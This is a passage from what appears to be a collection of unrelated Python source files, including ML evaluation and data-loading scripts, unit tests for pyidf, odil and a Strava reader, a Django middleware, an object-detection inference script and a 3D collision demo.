result = sklearn.metrics.log_loss(gold_scores, scores)
TP, FP, TN, FN = perf_measure(gold_scores, scores)
acc = np.sum(np.array(gold_scores) == np.array(scores))/len(gold_scores)
print('Log Loss: ' + str(result))
print('Acc: ' + str(acc))
print('TP: ' + str(TP) + '\tFP: ' + str(FP) + '\tTN: ' + str(TN) + '\tFN: ' + str(FN))
print(scores)
print(gold_scores)
return result, acc, TP, FP, TN, FN
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-q', '--question_file', required=True, type=str)
parser.add_argument('-e', '--embedding', required=True, type=str)
#parser.add_argument('-t', '--threshold', default='0.8', type=float)
parser.add_argument('-p', '--prefix', type=str, default=None)
args = parser.parse_args()
qm = Question_Manager(embedding_path=args.embedding)
for threshold in [0.5, 0.6, 0.7, 0.75, 0.8, 0.85, 0.9, 0.95]:
print('===> Threshold: ' + str(threshold))
result = qm.evaluate_similarity(args.question_file, threshold, args.prefix)
if not os.path.exists('Results'):
os.makedirs('Results')
with open('Results/baseline.csv', 'a+') as file:
txtResults = str(args.embedding) + '\t' + str(threshold) + '\t' + str(result[0]) + '\t' + str(result[1]) + '\t' + \
str(result[2]) + '\t' + str(result[3]) + '\t' + str(result[4]) + '\t' + str(result[5])
print('%s' % (str(txtResults)), file=file)
|
11557683
|
import os
from time import sleep
from multiprocessing import Process
def test(i):
print(f"[{i}]PID:{os.getpid()},PPID:{os.getppid()}")
sleep(1)
def main():
p_list = [Process(target=test, args=(i, )) for i in range(10)]
for p in p_list:
p.start()
for p in p_list:
p.join()
print(f"[子进程{p.pid}]正常退出")
if __name__ == '__main__':
main()
|
11557727
|
import os
import tempfile
import unittest
import logging
from pyidf import ValidationLevel
import pyidf
from pyidf.idf import IDF
from pyidf.surface_construction_elements import WindowMaterialScreenEquivalentLayer
log = logging.getLogger(__name__)
class TestWindowMaterialScreenEquivalentLayer(unittest.TestCase):
def setUp(self):
self.fd, self.path = tempfile.mkstemp()
def tearDown(self):
os.remove(self.path)
def test_create_windowmaterialscreenequivalentlayer(self):
pyidf.validation_level = ValidationLevel.error
obj = WindowMaterialScreenEquivalentLayer()
# alpha
var_name = "Name"
obj.name = var_name
# real
var_screen_beambeam_solar_transmittance = 0.49995
obj.screen_beambeam_solar_transmittance = var_screen_beambeam_solar_transmittance
# real
var_screen_beamdiffuse_solar_transmittance = 0.49995
obj.screen_beamdiffuse_solar_transmittance = var_screen_beamdiffuse_solar_transmittance
# real
var_screen_beamdiffuse_solar_reflectance = 0.49995
obj.screen_beamdiffuse_solar_reflectance = var_screen_beamdiffuse_solar_reflectance
# real
var_screen_beambeam_visible_transmittance = 0.49995
obj.screen_beambeam_visible_transmittance = var_screen_beambeam_visible_transmittance
# real
var_screen_beamdiffuse_visible_transmittance = 0.49995
obj.screen_beamdiffuse_visible_transmittance = var_screen_beamdiffuse_visible_transmittance
# real
var_screen_beamdiffuse_visible_reflectance = 0.49995
obj.screen_beamdiffuse_visible_reflectance = var_screen_beamdiffuse_visible_reflectance
# real
var_screen_infrared_transmittance = 0.49995
obj.screen_infrared_transmittance = var_screen_infrared_transmittance
# real
var_screen_infrared_emissivity = 0.5
obj.screen_infrared_emissivity = var_screen_infrared_emissivity
# real
var_screen_wire_spacing = 0.0001
obj.screen_wire_spacing = var_screen_wire_spacing
# real
var_screen_wire_diameter = 0.0001
obj.screen_wire_diameter = var_screen_wire_diameter
idf = IDF()
idf.add(obj)
idf.save(self.path, check=False)
with open(self.path, mode='r') as f:
for line in f:
log.debug(line.strip())
idf2 = IDF(self.path)
self.assertEqual(idf2.windowmaterialscreenequivalentlayers[0].name, var_name)
self.assertAlmostEqual(idf2.windowmaterialscreenequivalentlayers[0].screen_beambeam_solar_transmittance, var_screen_beambeam_solar_transmittance)
self.assertAlmostEqual(idf2.windowmaterialscreenequivalentlayers[0].screen_beamdiffuse_solar_transmittance, var_screen_beamdiffuse_solar_transmittance)
self.assertAlmostEqual(idf2.windowmaterialscreenequivalentlayers[0].screen_beamdiffuse_solar_reflectance, var_screen_beamdiffuse_solar_reflectance)
self.assertAlmostEqual(idf2.windowmaterialscreenequivalentlayers[0].screen_beambeam_visible_transmittance, var_screen_beambeam_visible_transmittance)
self.assertAlmostEqual(idf2.windowmaterialscreenequivalentlayers[0].screen_beamdiffuse_visible_transmittance, var_screen_beamdiffuse_visible_transmittance)
self.assertAlmostEqual(idf2.windowmaterialscreenequivalentlayers[0].screen_beamdiffuse_visible_reflectance, var_screen_beamdiffuse_visible_reflectance)
self.assertAlmostEqual(idf2.windowmaterialscreenequivalentlayers[0].screen_infrared_transmittance, var_screen_infrared_transmittance)
self.assertAlmostEqual(idf2.windowmaterialscreenequivalentlayers[0].screen_infrared_emissivity, var_screen_infrared_emissivity)
self.assertAlmostEqual(idf2.windowmaterialscreenequivalentlayers[0].screen_wire_spacing, var_screen_wire_spacing)
self.assertAlmostEqual(idf2.windowmaterialscreenequivalentlayers[0].screen_wire_diameter, var_screen_wire_diameter)
|
11557773
|
import abc
class BaseWrapper(metaclass=abc.ABCMeta):
def __init__(self, env=None):
self.env = env
def set_env(self, env):
self.env = env
@abc.abstractmethod
def step(self, action):
raise NotImplementedError
@abc.abstractmethod
def reset(self):
        '''
        reset must return the same kind of observation as step: when reset is
        called, it is required to return the state of the environment at the
        moment of the reset.
        '''
raise NotImplementedError
def seed(self):
pass
def close(self):
pass
@abc.abstractmethod
def get_actionspace(self, character=None):
raise NotImplementedError
@abc.abstractmethod
def get_observationspace(self, character=None):
raise NotImplementedError
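# A minimal sketch of a concrete subclass (the wrapped `env` attributes are
# assumptions; adapt them to the actual environment API):
#
#     class PassThroughWrapper(BaseWrapper):
#         def step(self, action):
#             return self.env.step(action)
#         def reset(self):
#             return self.env.reset()
#         def get_actionspace(self, character=None):
#             return self.env.action_space
#         def get_observationspace(self, character=None):
#             return self.env.observation_space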
|
11557824
|
import os
from typing import Mapping, Optional, TextIO, Tuple, Union
from .context import Context
from .output import Renderer, render
def determine_format(filename: Optional[str], choices: Mapping[str, Renderer], default: str) -> str:
if filename:
ext = os.path.splitext(filename)[1].lstrip('.').lower()
if ext in choices:
return ext
return default
class Template:
def __init__(self, template, filename: Optional[str] = None) -> None:
if not isinstance(template, list):
raise TypeError(
f'`template` must be a list of objects; {template!r} is not. Are you maybe looking for Template.parse()?'
)
self.template, self.defaults = extract_defaults(template, filename)
self.filename = filename
def enrich(self, context: Union[dict, Context]):
context = Context(self.defaults, context, __file__=self.filename)
return context.enrich(self.template)
def render(self, context: Union[dict, Context], format: str = 'yaml') -> str:
enriched = self.enrich(context)
return render(enriched, format)
@classmethod
def parse(
cls,
data: Union[TextIO, str],
format: Optional[str] = None,
filename: Optional[str] = None,
) -> 'Template':
from .input import PARSERS, parse
if filename is None and hasattr(data, 'name') and data.name: # type: ignore
filename = data.name # type: ignore
if format is None:
format = determine_format(filename, PARSERS, 'yaml')
return cls(template=parse(data, format=format), filename=filename)
def extract_defaults(template, filename: Optional[str]) -> Tuple[list, dict]:
from .tags import Defaults, Include
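    # Merge every Defaults document (plus the defaults of any Include'd
    # template) into one dict, then strip the Defaults documents themselves
    # from the returned template.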
defaults = {}
for doc in template:
if isinstance(doc, Defaults):
defaults.update(doc.data)
elif isinstance(doc, Include):
temp_context = Context()
temp_context.update(defaults, __file__=filename)
defaults.update(doc.get_template(temp_context).defaults)
template = [doc for doc in template if not isinstance(doc, Defaults)]
return template, defaults
|
11557860
|
from collections import Counter
import glob
import os
from tqdm import tqdm
import torch
import pandas as pd
import torch.utils.data as tud
def load_clean_aol(folder, use_tqdm=True):
ct_names = glob.glob(os.path.join(folder, 'clean-*.txt'))
dfs = []
if use_tqdm: ct_names = tqdm(ct_names)
for ct_name in ct_names:
idx = int(ct_name.split('-')[-1].split('.txt')[0])
df = pd.read_csv(ct_name, sep='\t', quoting=3, error_bad_lines=False, keep_default_na=False).astype(str)
dfs.append((idx, df))
dfs = [x[1] for x in sorted(dfs, key=lambda x: x[0])]
return dfs
class SingleSentenceDataset(tud.Dataset):
def __init__(self, sentences):
super().__init__()
self.sentences = sentences
def __getitem__(self, idx):
return idx, self.sentences[idx]
def __len__(self):
return len(self.sentences)
@classmethod
def splits(cls, folder, train_file='train.tsv', dev_file='dev.tsv',
test_file='test.tsv', column='sentence',
filter_label=None, label_column='label', **kwargs):
dfs = [os.path.join(folder, x) for x in (train_file, dev_file, test_file)]
dfs = [pd.read_csv(df, sep='\t', quoting=3, error_bad_lines=True, keep_default_na=False).astype(str) for df in dfs]
if filter_label is not None:
for idx in (0, 1): dfs[idx] = dfs[idx][dfs[idx][label_column] == filter_label]
sentences_lst = [list(df[column]) for df in dfs]
return [cls(x) for x in sentences_lst]
@classmethod
def pair_splits(cls, folder, train_file='train.tsv', dev_file='dev.tsv',
test_file='test.tsv', column1='question1', column2='question2',
filter_label='0', label_column='is_duplicate', **kwargs):
dfs = [os.path.join(folder, x) for x in (train_file, dev_file, test_file)]
dfs = [pd.read_csv(df, sep='\t', quoting=3, error_bad_lines=True, keep_default_na=False).astype(str) for df in dfs]
if filter_label is not None:
for idx in (0, 1): dfs[idx] = dfs[idx][dfs[idx][label_column] == filter_label]
        sentences_lst = [[' \t '.join((x, y)) for x, y in zip(df[column1], df[column2])] for df in dfs]
return list(map(cls, sentences_lst))
class Dictionary(object):
def __init__(self, eos=True, pad=True, sos=True):
self.word2idx = {}
self.idx2word = []
self.counter = Counter()
self.total = 0
if eos: self.add_word('<eos>')
if pad: self.add_word('<pad>')
if sos: self.add_word('<sos>')
def add_word(self, word):
if word not in self.word2idx:
self.idx2word.append(word)
self.word2idx[word] = len(self.idx2word) - 1
token_id = self.word2idx[word]
self.counter[token_id] += 1
self.total += 1
return self.word2idx[word]
def __len__(self):
return len(self.idx2word)
def sent2idx(self, sentences, **kwargs):
tokens_lst, tokens_mask = tokenize_batch(sentences, **kwargs)
tokens_lst = [[self.word2idx[x] for x in sent] for sent in tokens_lst]
return tokens_lst, tokens_mask
def tokenize_batch(sentences,
tokenize_fn=list,
eos='<eos>',
pad='<pad>',
sos=None,
max_len=100,
pad_to_max=False):
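    # Tokenize each sentence, bracket it with optional <sos>/<eos> markers,
    # then truncate and pad to a common length, returning a parallel 0/1 mask.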
eos_append = [eos] if eos else []
sos_prepend = [sos] if sos else []
tokens_lst = [sos_prepend + tokenize_fn(x) + eos_append for x in sentences]
tokens_mask = [[1] * len(x) for x in tokens_lst]
max_len = max_len if pad_to_max else min(max(map(len, tokens_lst)), max_len)
tokens_lst = [x[:max_len] for x in tokens_lst]
tokens_mask = [x[:max_len] for x in tokens_mask]
    tokens_lst = [x + [pad] * (max_len - len(x)) for x in tokens_lst]
tokens_mask = [x + [0] * (max_len - len(x)) for x in tokens_mask]
return tokens_lst, tokens_mask
def tokens_reduce(loss, tokens_lst):
mask = []
for tokens in tokens_lst:
mask.append([int(x != '<pad>') for x in tokens])
mask = torch.Tensor(mask)
loss = loss * mask
return loss.sum() / mask.sum()
|
11557902
|
import pandas as pd
import plotly.express as px
def iplot_bar_polar(self, theta, color, r='auto', template='xgridoff',
color_continuous_scale='auto', **kwds):
"""
It uses plotly.express.bar_polar.
In a polar bar plot, each row of 'color' is represented as a wedge mark in polar coordinates.
Parameters
----------
    theta: str
        wf.data column with the directions in degrees (0 - 360)
    color: str
        wf.data column with the data to plot with colors
    r: str
        wf.data column with the data to use as the radius.
        If r = 'auto', r is the count of 'theta' values in each direction.
template: str
Plotly express style templates.
Options:
'ggplot2'
'seaborn'
'simple_white'
'plotly'
'plotly_white'
'plotly_dark'
'presentation'
'xgridoff'
'ygridoff'
'gridon'
'none'
color_continuous_scale: plotly.express.sequential
View https://plotly.com/python/colorscales/.
If color_continuous_scale = 'auto', color_continuous_scale = px.colors.sequential.Rainbow
**kwds: plotly.express.bar_polar arguments
Returns
-------
fig: plotly.graph_objects.Figure
"""
if color_continuous_scale == 'auto':
color_continuous_scale = px.colors.sequential.Rainbow
df = self.data.copy()
# Create directions
df['direction'] = 'N'
df.loc[df[theta].between(11.25, 33.75) , 'direction'] = 'NNE'
df.loc[df[theta].between(33.75, 56.25) , 'direction'] = 'NE'
df.loc[df[theta].between(56.25, 78.75) , 'direction'] = 'ENE'
df.loc[df[theta].between(78.75, 101.25) , 'direction'] = 'E'
df.loc[df[theta].between(101.25, 123.75) , 'direction'] = 'ESE'
df.loc[df[theta].between(123.75, 146.25) , 'direction'] = 'SE'
df.loc[df[theta].between(146.25, 168.75) , 'direction'] = 'SSE'
df.loc[df[theta].between(168.75, 191.25) , 'direction'] = 'S'
df.loc[df[theta].between(191.25, 213.75) , 'direction'] = 'SSW'
df.loc[df[theta].between(213.75, 236.25) , 'direction'] = 'SW'
df.loc[df[theta].between(236.25, 258.75) , 'direction'] = 'WSW'
df.loc[df[theta].between(258.75, 281.25) , 'direction'] = 'W'
df.loc[df[theta].between(281.25, 303.75) , 'direction'] = 'WNW'
df.loc[df[theta].between(303.75, 326.25) , 'direction'] = 'NW'
df.loc[df[theta].between(326.25, 348.75) , 'direction'] = 'NNW'
new_index = ['N', 'NNE', 'NE', 'ENE', 'E', 'ESE', 'SE', 'SSE', 'S',
'SSW', 'SW', 'WSW', 'W', 'WNW', 'NW', 'NNW']
# Create serie of counts for directions
s_dir = df['direction'].value_counts()
s_dir.rename('frequency', inplace=True)
# Create mean of directions
df_mean = df.groupby(['direction']).mean()
df_work = pd.merge(s_dir, df_mean[color], right_index=True, left_index=True)
if r != 'auto':
df_work = pd.merge(df_work, df_mean[r], right_index=True,
left_index=True)
df_work = df_work.reindex(new_index)
df_work.reset_index(inplace=True)
df_work.rename(columns={'index': 'direction'}, inplace=True)
df_work[color] = df_work[color].fillna(0)
df_work.loc[df_work[color] == 0, 'frequency'] = 0
if r == 'auto':
r = 'frequency'
try:
labels = {color: f'{self.vocabulary[color]["long_name"]} ({self.vocabulary[color]["units"]})'}
except KeyError:
        labels = None
fig = px.bar_polar(df_work, r=r, theta="direction", color=color,
color_continuous_scale= color_continuous_scale,
template=template, labels=labels)
return fig
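# A minimal usage sketch (`wf` with a pandas DataFrame in `wf.data` holding
# hypothetical 'wind_dir' and 'wind_speed' columns is an assumption):
#
#     fig = iplot_bar_polar(wf, theta='wind_dir', color='wind_speed')
#     fig.show()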
|
11557929
|
import os
import sys
import json
from sklearn.model_selection import train_test_split
def load_labels(database_path):
if os.path.isdir(database_path):
labels = os.listdir(database_path)
return labels
def get_dataset(database_path):
if not os.path.exists(database_path):
raise IOError('not exist path')
no_dir = os.path.join(database_path, 'no')
fi_dir = os.path.join(database_path, 'fi')
no_data = os.listdir(no_dir)
fi_data = os.listdir(fi_dir)
no_train, no_test = train_test_split(no_data, test_size=0.2, shuffle=True)
fi_train, fi_test = train_test_split(fi_data, test_size=0.2, shuffle=True)
train_database = {}
for file_name in no_train:
name, _ = os.path.splitext(file_name)
train_database[name] = {}
train_database[name]['subset'] = 'training'
train_database[name]['annotations'] = {'label': 'no'}
for file_name in fi_train:
name, _ = os.path.splitext(file_name)
train_database[name] = {}
train_database[name]['subset'] = 'training'
train_database[name]['annotations'] = {'label': 'fi'}
val_database = {}
for file_name in no_test:
name, _ = os.path.splitext(file_name)
val_database[name] = {}
val_database[name]['subset'] = 'validation'
val_database[name]['annotations'] = {'label': 'no'}
for file_name in fi_test:
name, _ = os.path.splitext(file_name)
val_database[name] = {}
val_database[name]['subset'] = 'validation'
val_database[name]['annotations'] = {'label': 'fi'}
return train_database, val_database
def generate_annotation(database_path, dst_json_path):
labels = load_labels(database_path)
train_database, val_database = get_dataset(database_path)
dst_data = {}
dst_data['labels'] = labels
dst_data['database'] = {}
dst_data['database'].update(train_database)
dst_data['database'].update(val_database)
with open(dst_json_path, 'w') as dst_file:
json.dump(dst_data, dst_file)
if __name__ == '__main__':
database_path = sys.argv[1]
dst_json_path = database_path + '.json'
generate_annotation(database_path, dst_json_path)
|
11557935
|
from typing import List
from UE4Parse.BinaryReader import BinaryStream
from UE4Parse.Assets.Objects.Structs.Vector import FVector
class FPositionVertexBuffer:
Verts: List[FVector]
Stride: int
NumVertices: int
def __init__(self, reader: BinaryStream):
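        # Serialization layout of UE4's FPositionVertexBuffer: stride and
        # vertex count, followed by a bulk-serialized array of FVector.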
self.Stride = reader.readInt32()
self.NumVertices = reader.readInt32()
self.Verts = reader.readBulkTArray(FVector, reader)
def GetValue(self):
return {
"Stride": self.Stride,
"NumVertices": self.NumVertices,
"Vertices": [x.GetValue() for x in self.Verts]
}
|
11557949
|
import unittest
import odil
class TestSelector(unittest.TestCase):
def test_default_constructor(self):
selector = odil.webservices.Selector()
self.assertFalse(selector.is_study_present())
self.assertFalse(selector.is_series_present())
self.assertFalse(selector.is_instance_present())
self.assertEqual(list(selector.get_frames()), [])
def test_full_constructor(self):
selector = odil.webservices.Selector({"studies" :"1.2", "series" :"3.4", "instances" :"5.6"}, [7,8])
self.assertTrue(selector.is_study_present())
self.assertEqual(selector.get_study(), "1.2")
self.assertTrue(selector.is_series_present())
self.assertEqual(selector.get_series(), "3.4")
self.assertTrue(selector.is_instance_present())
self.assertEqual(selector.get_instance(), "5.6")
self.assertEqual(list(selector.get_frames()), [7,8])
def test_get_path_no_frames(self):
selector = odil.webservices.Selector(
{"studies" :"1.2", "series" :"3.4", "instances" :"5.6"}, [7,8])
self.assertEqual(
selector.get_path(False), "/studies/1.2/series/3.4/instances/5.6")
def test_get_path_frames(self):
selector = odil.webservices.Selector(
{"studies" :"1.2", "series" :"3.4", "instances" :"5.6"}, [7,8])
self.assertEqual(
selector.get_path(True),
"/studies/1.2/series/3.4/instances/5.6/frames/7,8")
if __name__ == "__main__":
unittest.main()
|
11557952
|
from re import compile
from django.conf import settings
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.contrib.auth.views import redirect_to_login
if hasattr(settings, "LOGIN_REQUIRED_URLS"):
URLS = [compile(expr) for expr in settings.LOGIN_REQUIRED_URLS]
class ActiveUserRequiredMiddleware:
"""
Middleware that requires a user to be active to view any page specified in
    settings.LOGIN_REQUIRED_URLS. Since these URLs are regular expressions,
you can copy them from your urls.py.
Requires authentication middleware and template context processors to be
loaded. You'll get an error if they aren't.
"""
def process_request(self, request):
path = request.path_info.lstrip("/")
if any(u.match(path) for u in URLS):
if not request.user.is_active:
next_url = request.get_full_path()
return redirect_to_login(next_url, settings.LOGIN_URL,
REDIRECT_FIELD_NAME)
|
11557963
|
import argparse
import json
import os
from typing import List, Tuple
import numpy as np
from PIL import Image, ImageFile
import tensorflow as tf
from tqdm import tqdm
# A couple of images are a bit large, we set this flag to load them properly.
ImageFile.LOAD_TRUNCATED_IMAGES = True
parser = argparse.ArgumentParser()
parser.add_argument(
"--graph",
default="models/open_images_train_tensorflow_detection_api/"
"faster_rcnn_inception_resnet_v2_atrous_oid_v4_2018/frozen_inference_graph.pb",
help="Path to frozen inference graph of pre-trained detector.",
)
parser.add_argument(
"--images", help="Path to a directory containing images for a particular split."
)
parser.add_argument(
"--annotations",
help="Path to annotations JSON file (in COCO format) containing image info.",
)
parser.add_argument(
"--boxes-per-image",
type=int,
default=18,
help="Number of detected bounding boxes per image.",
)
parser.add_argument(
"--output",
default="/outputs/detections.json",
help="Path to save the output JSON (in COCO format) with detected boxes.",
)
def _image_ids(annotations_path: str) -> List[Tuple[int, str]]:
r"""
Given path to an annotation file in COCO format, return ``(image_id, filename)`` tuples.
Parameters
----------
annotations_path: str
Path to an annotation file in COCO format. Must contain "images" key.
Returns
-------
List[Tuple[int, str]]
List of ``(image_id, filename)`` tuples.
"""
image_annotations = json.load(open(annotations_path))["images"]
image_ids = [(im["id"], im["file_name"]) for im in image_annotations]
image_ids = sorted(image_ids, key=lambda k: k[0])
return image_ids
if __name__ == "__main__":
_A = parser.parse_args()
# List of tuples of image IDs and their file names.
image_ids = _image_ids(_A.annotations)
# Populate this dict with all the detected boxes (in COCO format).
output_coco_format = {"categories": [], "images": [], "annotations": []}
# --------------------------------------------------------------------------------------------
# Load Faster-RCNN frozen inference graph. Contains both, architecture definition and weights.
rcnn_frozen_inference_graph = tf.Graph()
with rcnn_frozen_inference_graph.as_default():
rcnn_frozen_inference_graphdef = tf.GraphDef()
with tf.gfile.GFile(_A.graph, "rb") as f:
rcnn_frozen_inference_graphdef.ParseFromString(f.read())
tf.import_graph_def(rcnn_frozen_inference_graphdef, name="")
# Get handles to input and output tensors.
image_tensor = tf.get_default_graph().get_tensor_by_name("image_tensor:0")
detection_outputs = {
key: tf.get_default_graph().get_tensor_by_name(key + ":0")
for key in [
"num_detections",
"detection_boxes",
"detection_scores",
"detection_classes",
]
}
# --------------------------------------------------------------------------------------------
# --------------------------------------------------------------------------------------------
# Run inference on all images and save predicted boxes, classes and confidence scores.
with rcnn_frozen_inference_graph.as_default():
session = tf.Session()
for image_id, image_filename in tqdm(image_ids):
image_path = os.path.join(_A.images, image_filename)
image = Image.open(image_path).convert("RGB")
image_width, image_height = image.size
image_ndarray = np.array(image)
# Run inference on image (add batch dimension first).
output_dict = session.run(
detection_outputs,
feed_dict={image_tensor: np.expand_dims(image_ndarray, 0)},
)
# Remove the batch dimension and cast outputs to appropriate types.
output_dict["detection_boxes"] = output_dict["detection_boxes"][0]
output_dict["detection_classes"] = output_dict["detection_classes"][0]
output_dict["detection_scores"] = output_dict["detection_scores"][0]
# Populate the image info in COCO format. This is just for completeness of the output
# detections JSON file.
output_coco_format["images"].append(
{
"id": image_id,
"file_name": image_filename,
"height": image_height,
"width": image_width,
}
)
# Populate the output detections list with these detections.
# Boxes (and corresponding classes) list is sorted by decreasing confidence score.
for box, clss, score in zip(
output_dict["detection_boxes"],
output_dict["detection_classes"],
output_dict["detection_scores"],
):
if sum(box) > 0:
# This is not a zero-area box (padding).
# Boxes are of the form [Y1, X1, Y2, X2] in [0, 1].
# Convert to [X1, Y1, X2, Y2]. Also, un-normalize by image width and height.
box = [
box[1] * image_width,
box[0] * image_height,
box[3] * image_width,
box[2] * image_height,
]
output_coco_format["annotations"].append(
{
"image_id": image_id,
"category_id": int(clss),
"bbox": [float(coordinate) for coordinate in box],
"score": float(score),
}
)
# --------------------------------------------------------------------------------------------
# Populate the (Open Images) categories field from external file, for completeness.
# This path is relative to $PROJECT_ROOT, so make sure to run script from there.
output_coco_format["categories"] = json.load(open("data/oi_categories.json"))
print("Saving output detections to {}...".format(_A.output))
json.dump(output_coco_format, open(_A.output, "w"))
|
11557969
|
import pytest
import pandas as pd
import sweat
from sweat.io import strava
from .utils import sweatvcr
def test_top_level_import():
assert sweat.read_strava == strava.read_strava
@sweatvcr.use_cassette()
def test_read_strava():
activity = sweat.read_strava(
activity_id="3547667536", access_token="<PASSWORD>"
)
assert isinstance(activity, pd.DataFrame)
assert isinstance(activity.index, pd.DatetimeIndex)
columns = set(
[
"elevation",
"speed",
"cadence",
"grade",
"heartrate",
"power",
"temperature",
"distance",
"moving",
"latitude",
"longitude",
]
)
assert columns == set(activity.columns.tolist())
|
11558023
|
import os
import sys
import inspect
def init():
    # realpath() will make your script run, even if you symlink it :)
cmd_folder = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile(inspect.currentframe()))[0]))
if cmd_folder not in sys.path:
sys.path.insert(0, cmd_folder)
# use this if you want to include modules from a subfolder
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile(inspect.currentframe()))[0], "../")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
|
11558026
|
import numpy as np
from vulcanai.net import Network
import theano.tensor as T
from vulcanai.utils import get_one_hot
from vulcanai import mnist_loader
from vulcanai.model_tests import run_test
(train_images, train_labels, test_images, test_labels) = mnist_loader.load_fashion_mnist()
train_labels = get_one_hot(train_labels)
input_var = T.fmatrix('input')
y = T.fmatrix('truth')
network_dense_config = {
'mode': 'dense',
'units': [512],
'dropouts': [0.2],
}
dense_net = Network(
name='3_dense_test',
dimensions=[None] + list(train_images.shape[1:]),
input_var=input_var,
y=y,
config=network_dense_config,
input_network=None,
num_classes=10,
activation='rectify',
pred_activation='softmax',
optimizer='adam')
# # Use to load model from disk
# # dense_net = Network.load_model('models/20170704194033_3_dense_test.network')
dense_net.train(
epochs=2,
train_x=train_images[:50000],
train_y=train_labels[:50000],
val_x=train_images[50000:60000],
val_y=train_labels[50000:60000],
batch_ratio=0.05,
plot=True
)
dense_net.save_record()
run_test(dense_net, test_x=train_images[50000:60000], test_y=train_labels[50000:60000])
dense_net.save_model()
|
11558028
|
import os
from payton.scene import Scene
from payton.scene.collision import CollisionTest
from payton.scene.geometry import Wavefront
from payton.scene.gui import info_box
direction = 0
def motion(period, total):
global scene, direction
pos = scene.objects["scar2"].position
apos = scene.objects["acar2"].position
if direction == 0:
pos[2] -= 0.01
apos[2] -= 0.01
else:
pos[2] += 0.01
apos[2] += 0.01
if pos[2] < 0:
direction = 1
if pos[2] > 4:
direction = 0
scene.objects["scar2"].position = pos
scene.objects["acar2"].position = apos
def hit_sphere(collision, pairs):
for pair in pairs:
pair[0].material.color = [1.0, 0, 0]
pair[1].material.color = [1.0, 0, 0]
# Once there is a hit, system will not check
# for the same collision, if you want to have the objects
# back in the collision detection pipeline, you have to do
collision.resolve(pair[0], pair[1])
return True
def hit_aabb(collision, pairs):
for pair in pairs:
pair[0].material.color = [0.0, 1.0, 0]
pair[1].material.color = [0.0, 1.0, 0]
# Once there is a hit, system will not check
# for the same collision, if you want to have the objects
# back in the collision detection pipeline, you have to do
collision.resolve(pair[0], pair[1])
return True
scene = Scene(width=600, height=600)
spherical_collision = CollisionTest(callback=hit_sphere, level=CollisionTest.SPHERICAL)
aabb_collision = CollisionTest(callback=hit_aabb, level=CollisionTest.AABB)
car_object_file = os.path.join(os.path.dirname(__file__), "lib", "Low-Poly-Racing-Car.obj")
spherical_car_1 = Wavefront(filename=car_object_file)
spherical_car_2 = Wavefront(filename=car_object_file)
aabb_car_1 = Wavefront(filename=car_object_file)
aabb_car_2 = Wavefront(filename=car_object_file)
spherical_car_1.position = [-2, 0, 0]
spherical_car_2.position = [-2, 0, 4]
aabb_car_1.position = [2, 0, 0]
aabb_car_2.position = [2, 0, 4]
scene.add_object("scar1", spherical_car_1)
scene.add_object("scar2", spherical_car_2)
scene.add_object("acar1", aabb_car_1)
scene.add_object("acar2", aabb_car_2)
spherical_collision.add_object(spherical_car_1)
spherical_collision.add_object(spherical_car_2)
aabb_collision.add_object(aabb_car_1)
aabb_collision.add_object(aabb_car_2)
scene.add_collision_test("spherical_collision", spherical_collision)
scene.add_collision_test("aabb_collision", aabb_collision)
scene.create_clock("motion", 0.01, motion)
scene.add_object(
"info",
info_box(left=10, top=10, label="Hit SPACE to start animation"),
)
scene.run()
|